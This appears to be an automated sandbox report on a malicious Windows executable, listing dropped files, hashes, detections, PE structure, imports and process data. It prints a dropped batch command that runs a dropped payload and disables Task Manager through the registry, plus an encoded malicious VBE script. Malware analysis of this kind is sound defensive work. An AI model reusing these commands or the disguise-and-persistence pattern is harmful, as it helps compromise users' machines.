            SSDEEP:6:vuORkCeQGMn+tMI2UoXLGtsL8RJbGCoCFmNZtVp6N1fVRH4hu3NNFVuEcVogJw5o:WRGLxXLPL8R1bZmBOhzHb3NLVu6g+S
            MD5:94EAAF1B3E03C46EB5E6B194E26F7796
            SHA1:9B61EB51C3022BD44C1BADE6B46B1BEFFAB29908
            SHA-256:74A182E0BBAA1C1EB907954A739319B72DA87B7C5DDD0A9BC690D970D5C2FACB
            SHA-512:D312303806F46146030E1F6657AEBCF996A73FEF3FD0AF2D83365E5A62CDE350C75A1F22D5F616035DAECCAB5E22EAF2985F2A0069D2C1C27884998153A2A707
            Malicious:false
            Preview:BfIYhiHOrae4GpkutkFHYgMZxM9idTpPrYaGAciQf6Ccf13Vq7qFmb5eSslVijuYvPNrOdtQCzmcdu35Tn1fmjmPc5xS1Mr5LoqQnLGMOZDxzdAizqC5sPvLm8PSqbZzIrQzDnRHhoRNgza85OcLKwN62fop6xgw9OoINLfLY4YD8iowhQXb8OoWdT6i8lLtIeNSLSvttRwPXJ7U02HpZFyvjSo3O6Nxto5eVWkPforrbZ8UVmsGdfTDpbt3o1exD9gtOd8dR2KvXHUKTThmOGTNU1y3nrknJ4nc2OF2nOykUipiHjjUT2i6pSYWpF0jRgmdd1RENp9ASs2wMP

            C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Windows\ELAMBKUP\55b276f4edf653

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with very long lines (470), with no line terminators
            Category:dropped
            Size (bytes):470
            Entropy (8bit):5.864916497717177
            Encrypted:false
            SSDEEP:12:yvqVsFd7iR6KjzH22KbUrNA/r7qfk1MpPfV0UBMvtrbFAJRK8Zw0gFBf+w:ySVsn7IDjzH22KbUrNAr7qcCMvtip1cz
            MD5:5FBF29E4EF400E0EF6D213D4598BEC6D
            SHA1:F296003BF344C4E1C7B5D0DF8BB70E5FCCD19C90
            SHA-256:CD1B17C1C5B1D5A0443E00CF85EBB2C684CFF432D6C83B86DE38C480BC5075B6
            SHA-512:641F10C275DD695686353DB949EC5D19C78B2C0492C74A30763F90273FFE3C57A2E3FF64BD61C3523B58700FB1452762D4688C812C8640934BA0CEFE60FC524B
            Malicious:false
            Preview:LZqnC94fhyTqYFMia6w90FRO14Ludz0paA9hlKxZuwZKvJB6yYcVbHmFHbvIyJBr8nQYGo7PJWOEqHds3P5FWeNSY3aJZpllvrLH2n0KaMME3iZA8DOjN5Uda8AMOx0dvnS85VzPYvoJRIZzdaLWaCXzWrr4nn5mWsTQPaEmN8KcQKMRjKsyldDtPcmNn5mvzBxjzIkDViIb15jLfZUc4HB3pjAwy09RWZmOXncakpcCUl1U3asNkK0sA43PIxOfj1FcSUx2742Pp8iDrp2XIvrMi3NdtMRwa7cdfZBjm0QqRkDCVzhd40XyJ33YGUIvmGyrfEiSnTvSfB480LI3oy1jkoUmfmcSreDLwVhQRPzlFETI95i5MOHyOPH1u5wA0ckA8tLfn1mZ8PdfULnkEhGcXP6hOpgVczumeSKPtDRUmsz9vlgiSM5TWHnsxoQ8UQ6Je1BBBX1BPvzpZ6vmI7

            C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\reviewDriverIntosessionnet\48b6e448d1d68f

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with very long lines (693), with no line terminators
            Category:dropped
            Size (bytes):693
            Entropy (8bit):5.890577813837475
            Encrypted:false
            SSDEEP:12:QLhHscAgIi/6qqH48hBg6+nTQTC1WMRFlWnbMh85kfZMM3EUErYbu0rQx0tiEw:Q5scCirEzDUTQTaWMR6nbMZhMFUk0rQv
            MD5:7BFF554121C91EC7A8D28A50886EC460
            SHA1:EBDA57C8F588E5455328E047FE60E89641550D9F
            SHA-256:6207507929ED53F70D1AA587C586CA03F39069177989405715ED2005A2DEB011
            SHA-512:B35FDA327EEBC5AF7B90FC36A9C4D2C78E7BCFB5EBF1D9585ADB131E135099F54CE04ECE9683C7F878BAEEC8129BEF73F77667EBA8EA875E7F7BD73C00DCEAE8
            Malicious:false
            Preview:ZV1nyuNERmggD2eEiTpYwBb0ZMN4hi5BWbrjH7deKoJyVc2FJ8cTmA4Y3BOlgThtqfJlK47l0KOH2mf6UIviFmYWhTpFs271HZHzTR5OB1dbwwfRgRRYh8oEGwE0P127NWAdepnCNhhOJ6kuxYiakjTIvDtgNE8J8fOZvCw1oOLAbZ4JMTC1SbXnC2sb5GzIiXQorK8vlrwVXSqVIkU3BH1gHlX3UV5iZCcEJQbBURPlpBQtMWSVv6HbftgGxFaQvO6U0lL2ISit1Q1GUnr7Ckwd5BiatUOO09zbE53kKaMdXXjP2avJYcNLbdZyDvIyET21aZBZuGxmXSFhbTiTiF0Ywn9kfEgZSYZDesycYWYRpkxIY1XuNyP8deFxab3qkYU93CDteF5MrisLz0MoqwLdIak9mBB7crrRQyOVyoPH2DR5w47kOP9xM00dbDGcE8u90a5Bl0zCgDkFIoNsDbsMr4FZ7v4uhxD4SSEV968Xa7QIPvVw0XYmPiS6VfD06EftAqw0k1tHcVvun6JMaH4JYaou9I9d2IaVbgHj8eM9oQK4whSZW1azKVVkCC0b1QPU5ZSGykO545fHQu7c0kHBrkLGLhg6nuHXBz8WOLkvne5P0OUSEYlRJOmUOM5RERRJxHFavlNo9VYNp6P7MN1PI0OxMoICPTrVNvbsI3hdK6Ry0ZpR6

            C:\reviewDriverIntosessionnet\NRWB62aUrGQ.bat

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):165
            Entropy (8bit):4.901737936790576
            Encrypted:false
            SSDEEP:3:I5QToiNNKYGT1aABAnM4AZFQNBZwXD9so3KRfyM1K7eB/k+7W34hebJNAKyMhF72:IOc4KIJnM4XTStuH1jhRiI36BY
            MD5:EA59BC2176799A45A6B1955902E6A52F
            SHA1:80A1BB215FF83B14A10F471FC61A33FC24A6AFFF
            SHA-256:65D211F8592F7E1CE008FFC0B8976F82AB1F726A95C7E397D878DD2F20681973
            SHA-512:F839CCACF529991B085482B42B1D8A406C1E7219128FA78CD5170126E9839375F79AB29DA2BB4FA44903EF9D3FD2DAC9ECEDA1B8CA2A5767DE98568E94DC0485
            Malicious:false
            Preview:"C:\reviewDriverIntosessionnet\comProviderServer.exe" & reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

            C:\reviewDriverIntosessionnet\V50gFn.vbe

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:data
            Category:dropped
            Size (bytes):214
            Entropy (8bit):5.786313698274228
            Encrypted:false
            SSDEEP:6:G3wqK+NkLzWbHa/818nZNDd3RL1wQJR8i+6/yoNdoF2kEs:G+MCzWLaG4d3XBJ2F6TNS2k7
            MD5:364D2DCF3089421FC2C2CBB33427ACC8
            SHA1:FC9EF23D531721AC7D70BB8C5822446F88C9FDB0
            SHA-256:9A54E372884CB902A33FF5ADA3FED3AB54621AD868559A95A84D66D3A03D8771
            SHA-512:0BFE69F8EE3751411AA9F1A1D8690963FB61D3E1AD5C88FCAEA211081C48D7AD8D93C5E275BA2E1C9DA0CC89EC5B1CFCC25F90B8D4EA892AC20CC72CA9703CB5
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Preview:#@~^vQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJDn7k.hfMk7nD&xOWk+ddbWx.nYJ1Iq$. mjMM}R8CDJSPZSP6lsd.3DwAAA==^#~@.

            C:\reviewDriverIntosessionnet\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\reviewDriverIntosessionnet\comProviderServer.exe

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\reviewDriverIntosessionnet\f3b6ecef712a24

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with very long lines (307), with no line terminators
            Category:dropped
            Size (bytes):307
            Entropy (8bit):5.807020439510261
            Encrypted:false
            SSDEEP:6:pUoG9WSX/Q71SS+m32nlRFQQ97oLXl2ia2usa96fztbRzJlj:pUpZXY71SSh30qm7oLXPM96fz1/l
            MD5:19DD53513DCEC578CF32DD71506C303E
            SHA1:72AFE148522004E56C4E608088039BFD8B1966A2
            SHA-256:30159083A20F543E38319C399084AF684719DB3B83666666B406700C2DF509AD
            SHA-512:14AF2BDD6EF3F6EA385F400D1E272AF71A230462D4A78F34600C6D608B24C98CD4352CA732F1CEA1EC1D02EDAD4392F5F02515D5808A099C08B64CFC42465E7E
            Malicious:false
            Preview:Ro3Sx85wFeCwP6q91Mgucx3du80LXT3uXMXPMhS3vhv10CtLtC9UF10duahzHtZwlSZDjawU3m84CCmsOpcUUjogW3fw9dvBI9QinqmSPoad25bsyzkbREcBn2qp5AUa06vCwDFhDKEpILnacx8K3TuEhO4u96WPUAm6JY5uuCYH9w3cOQNIBKhhMrfhJUiGxzVIjrQD1Na05nEuVbfttOOKdFtc3YlZeRTKbu3hAKRytqljnvMrzyXjkKpd7yJcmAVnT4Ski8ti6ZawdKzIL3kp4ujQFZjLAyLtV8PsclJ0FymKu3A

            C:\reviewDriverIntosessionnet\file.vbs

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):34
            Entropy (8bit):4.124083797069061
            Encrypted:false
            SSDEEP:3:LlzRWDNMSdn:PWbn
            MD5:677CC4360477C72CB0CE00406A949C61
            SHA1:B679E8C3427F6C5FC47C8AC46CD0E56C9424DE05
            SHA-256:F1CCCB5AE4AA51D293BD3C7D2A1A04CB7847D22C5DB8E05AC64E9A6D7455AA0B
            SHA-512:7CFE2CC92F9E659F0A15A295624D611B3363BD01EB5BCF9BC7681EA9B70B0564D192D570D294657C8DC2C93497FA3B4526C975A9BF35D69617C31D9936573C6A
            Malicious:false
            Preview:MsgBox "TestDefault, Message!", 64

            C:\reviewDriverIntosessionnet\spoolsv.exe

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):7.558820661068853
            TrID:
            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            • Win32 Executable (generic) a (10002005/4) 49.97%
            • Generic Win/DOS Executable (2004/3) 0.01%
            • DOS Executable Generic (2002/1) 0.01%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:file.exe
            File size:2'771'800 bytes
            MD5:8a0082dc4822b5f82dee8be67d86d402
            SHA1:aa50f62b0ad60570db6d854ba2618f25a2b95882
            SHA256:443b28843ef46edf389d28b02cb45b89ec6a871f87f5b8bbeee8bb5e1e609126
            SHA512:64e1ebd45d34be7fbda474ef55b6ef68df973de0ab81b696d34434f9934a7af615eab1f434dfee58e8eba8ca947c66ba5eebe09cf785749d62a87b595fbd1227
            SSDEEP:49152:UbA30/KkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi4:UbrKkizioaAidp6UPSH0ttmx6TUXxb
            TLSH:2CD5D0017E44CE91F0181673C1AF520847B4E9112BA6E72BBDA9337D95363937E0EADB
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

            File Icon

            Icon Hash:1515d4d4442f2d2d

            Static PE Info

            General

            Entrypoint:0x41ec40
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

            Entrypoint Preview

            Instruction
            call 00007FE780D314A9h
            jmp 00007FE780D30EBDh
            cmp ecx, dword ptr [0043E668h]
            jne 00007FE780D31035h
            ret
            jmp 00007FE780D3162Eh
            int3
            int3
            int3
            int3
            int3
            push ebp
            mov ebp, esp
            push esi
            push dword ptr [ebp+08h]
            mov esi, ecx
            call 00007FE780D23DC7h
            mov dword ptr [esi], 00435580h
            mov eax, esi
            pop esi
            pop ebp
            retn 0004h
            and dword ptr [ecx+04h], 00000000h
            mov eax, ecx
            and dword ptr [ecx+08h], 00000000h
            mov dword ptr [ecx+04h], 00435588h
            mov dword ptr [ecx], 00435580h
            ret
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            lea eax, dword ptr [ecx+04h]
            mov dword ptr [ecx], 00435568h
            push eax
            call 00007FE780D341CDh
            pop ecx
            ret
            push ebp
            mov ebp, esp
            sub esp, 0Ch
            lea ecx, dword ptr [ebp-0Ch]
            call 00007FE780D23D5Eh
            push 0043B704h
            lea eax, dword ptr [ebp-0Ch]
            push eax
            call 00007FE780D338E2h
            int3
            push ebp
            mov ebp, esp
            sub esp, 0Ch
            lea ecx, dword ptr [ebp-0Ch]
            call 00007FE780D30FD4h
            push 0043B91Ch
            lea eax, dword ptr [ebp-0Ch]
            push eax
            call 00007FE780D338C5h
            int3
            jmp 00007FE780D35913h
            jmp dword ptr [00433260h]
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            push 00421EB0h
            push dword ptr fs:[00000000h]

            Rich Headers

            Programming Language:
            • [ C ] VS2008 SP1 build 30729
            • [IMP] VS2008 SP1 build 30729
            • [C++] VS2015 UPD3.1 build 24215
            • [EXP] VS2015 UPD3.1 build 24215
            • [RES] VS2015 UPD3 build 24213
            • [LNK] VS2015 UPD3.1 build 24215

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
            IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000xdfd0.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x710000x2268.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x310ea0x31200c5bf61bbedb6ad471e9dc6266398e965False0.583959526081425data6.708075396341128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0x330000xa6120xa8007980b588d5b28128a2f3c36cabe2ce98False0.45284598214285715data5.221742709250668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0x3e0000x237280x1000201530c9e56f172adf2473053298d48fFalse0.36767578125data3.7088186669877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .didat0x620000x1880x200c5d41d8f254f69e567595ab94266cfdcFalse0.4453125data3.2982538067961342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x630000xdfd00xe000f6c0f34fae6331b50a7ad2efc4bfefdbFalse0.6370326450892857data6.6367506404157535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x710000x22680x2400c7a942b723cb29d9c02f7c611b544b50False0.7681206597222222data6.5548620101740545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountryZLIB Complexity
            PNG0x636500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
            PNG0x641980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
            RT_ICON0x657480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
            RT_ICON0x65cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
            RT_ICON0x665580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
            RT_ICON0x674000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
            RT_ICON0x678680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
            RT_ICON0x689100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
            RT_ICON0x6aeb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
            RT_DIALOG0x6f5880x286dataEnglishUnited States0.5092879256965944
            RT_DIALOG0x6f3580x13adataEnglishUnited States0.60828025477707
            RT_DIALOG0x6f4980xecdataEnglishUnited States0.6991525423728814
            RT_DIALOG0x6f2280x12edataEnglishUnited States0.5927152317880795
            RT_DIALOG0x6eef00x338dataEnglishUnited States0.45145631067961167
            RT_DIALOG0x6ec980x252dataEnglishUnited States0.5757575757575758
            RT_STRING0x6ff680x1e2dataEnglishUnited States0.3900414937759336
            RT_STRING0x701500x1ccdataEnglishUnited States0.4282608695652174
            RT_STRING0x703200x1b8dataEnglishUnited States0.45681818181818185
            RT_STRING0x704d80x146dataEnglishUnited States0.5153374233128835
            RT_STRING0x706200x446dataEnglishUnited States0.340036563071298
            RT_STRING0x70a680x166dataEnglishUnited States0.49162011173184356
            RT_STRING0x70bd00x152dataEnglishUnited States0.5059171597633136
            RT_STRING0x70d280x10adataEnglishUnited States0.49624060150375937
            RT_STRING0x70e380xbcdataEnglishUnited States0.6329787234042553
            RT_STRING0x70ef80xd6dataEnglishUnited States0.5747663551401869
            RT_GROUP_ICON0x6ec300x68dataEnglishUnited States0.7019230769230769
            RT_MANIFEST0x6f8100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

            Imports

            DLLImport
            KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
            gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States

            Network Behavior

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Sep 29, 2024 01:01:53.426326036 CEST5349946162.159.36.2192.168.2.7
            Sep 29, 2024 01:01:54.161360979 CEST53639111.1.1.1192.168.2.7

            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:1
            Start time:19:01:08
            Start date:28/09/2024
            Path:C:\Users\user\Desktop\file.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\file.exe"
            Imagebase:0xb80000
            File size:2'771'800 bytes
            MD5 hash:8A0082DC4822B5F82DEE8BE67D86D402
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            General

            Target ID:3
